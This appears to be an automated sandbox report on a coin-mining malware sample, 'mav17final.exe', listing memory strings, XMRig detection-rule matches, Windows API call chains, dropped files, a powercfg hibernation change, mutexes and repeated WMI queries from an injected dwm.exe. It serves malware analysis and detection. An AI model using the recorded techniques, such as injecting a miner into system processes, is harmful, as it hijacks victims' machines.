      Source: mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
      Source: mav17final.exe, 00000002.00000003.1996176454.0000018717946000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.00000187178CF000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.0000018717935000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
      Source: mav17final.exe, 00000002.00000002.2062169744.0000018717208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
      Source: mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
      Source: mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
      Source: mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
      Source: mav17final.exe, 00000002.00000002.2066729753.0000018718CBC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
      Source: mav17final.exe, 00000002.00000002.2068496795.00007FF8A8CEB000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
      Source: mav17final.exe, 00000002.00000003.1996176454.0000018717946000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.00000187178CF000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.0000018717935000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/4457745#4457745
      Source: mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
      Source: mav17final.exe, 00000002.00000002.2062169744.0000018717180000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992629255.000001871762E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
      Source: mav17final.exe, 00000002.00000002.2069042978.00007FF8A8D88000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

      System Summary

      Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9077910 NtQuerySystemInformation,2_2_00007FF8B9077910
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9072370 GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_00007FF8B9072370
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9074B90 GetActiveProcessorCount,fprintf,fprintf,fprintf,NtQuerySystemInformation,2_2_00007FF8B9074B90
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9076B00 GetProcessHeap,HeapAlloc,GetFileType,SetLastError,NtQueryObject,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9072730 OpenProcess,GetLastError,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,CloseHandle,GetProcessHeap,HeapFree,CloseHandle,GetProcessHeap,HeapFree,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9072B30 OpenProcess,GetLastError,NtSuspendProcess,NtResumeProcess,CloseHandle
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9077350 OpenProcess,GetLastError,NtQueryInformationProcess,RtlNtStatusToDosErrorNoTeb,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,ReadProcessMemory,NtQueryInformationProcess,CloseHandle,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,GetLastError,CloseHandle,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9073560 OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9073660 OpenProcess,GetLastError,NtSetInformationProcess,CloseHandle
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9075160 GetActiveProcessorCount,fprintf,fprintf,fprintf,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9076EB0 EnterCriticalSection,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetCurrentProcess,DuplicateHandle,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LeaveCriticalSection
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90776F0 OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle,CloseHandle,CloseHandle,NtQueryInformationProcess,CloseHandle,CloseHandle
Source: C:\Windows\System32\conhost.exe | Code function: 64_2_0000000140001394 NtAlpcCreatePort
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9075750: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle
Source: C:\ProgramData\dialer.exe | File created: C:\Windows\TEMP\ujjtjyeszdwn.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_fmmoe5wr.s0x.ps1
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA617BC
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA47850
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA61528
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA5C448
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA53A64
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA41F50
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA61F30
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA5C448
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA650A8
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA4A02C
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA5F5D0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA51E10
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA4FDFC
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA48ED0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA55EE0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA53A64
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA5D354
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA4A338
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA4FB94
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA5A358
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA57C50
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA61444
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA5F9FC
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA5994C
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA4996D
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA49B04
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA542E8
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9074B90
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9072030
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9072C20
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9075750
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9076EB0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90763A0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9075AC0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9073AE0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90793E0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90912B0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9096EAC
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9092530
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9098D40
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B909F81C
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9095CE0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9091BB0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90953A0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9092FF0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90C1000
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90C3E60
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90C2EB0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90C3BD0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90C60C0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90CC7D8
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B93C1060
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9F63200
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8BA247778
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8BA249620
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8BFAB27A0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8BFAB39F0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8BFAB32E0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8BFAB2ED0
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8BFAB3F50
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8BFAB1F50
Source: C:\Windows\System32\conhost.exe | Code function: 64_2_0000000140003270
Source: C:\Windows\System32\conhost.exe | Code function: 64_2_00000001400027D0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dll A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
Source: C:\Users\user\Desktop\mav17final.exe | Code function: String function: 00007FF8B9071070 appears 43 times
Source: C:\Users\user\Desktop\mav17final.exe | Code function: String function: 00007FF79EA42B30 appears 47 times
Source: C:\Users\user\Desktop\mav17final.exe | Code function: String function: 00007FF8B90717D0 appears 41 times
Source: unicodedata.pyd.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibsslH vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_elementtree.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepyexpat.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs mav17final.exe
Source: mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_decimal.pyd. vs mav17final.exe
Source: mav17final.exe | Binary or memory string: OriginalFilename vs mav17final.exe
Source: mav17final.exe, 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs mav17final.exe
Source: mav17final.exe, 00000002.00000002.2072844987.00007FF8B90B5000.00000002.00000001.01000000.0000000B.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs mav17final.exe
Source: mav17final.exe, 00000002.00000002.2072449949.00007FF8A8F27000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenamepython311.dll. vs mav17final.exe
Source: mav17final.exe, 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs mav17final.exe
Source: mav17final.exe, 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs mav17final.exe
Source: mav17final.exe, 00000002.00000002.2073189700.00007FF8B93D2000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs mav17final.exe
Source: mav17final.exe, 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs mav17final.exe
Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: classification engine | Classification label: mal100.spyw.evad.mine.winEXE@100/36@1/2
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 0_2_00007FF79EA48460 GetLastError,FormatMessageW,WideCharToMultiByte
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90782E0 GetCurrentProcess,OpenProcessToken,GetLastError,ImpersonateSelf,OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,AdjustTokenPrivileges,GetLastError,AdjustTokenPrivileges,RevertToSelf,FindCloseChangeNotification
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B90756B0 GetDiskFreeSpaceExW
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9072C20 CreateToolhelp32Snapshot,CloseHandle,CloseHandle,Thread32First,OpenThread,GetThreadTimes,CloseHandle,Thread32Next,CloseHandle
Source: C:\Users\user\Desktop\mav17final.exe | Code function: 2_2_00007FF8B9078F50 StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6076:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2944:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3380:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5980:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3140:120:WilError_03
Source: C:\Windows\System32\dwm.exe | Mutant created: \BaseNamedObjects\Global\genqhuyafccnswcc
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Users\user\Desktop\mav17final.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI19682
Source: mav17final.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
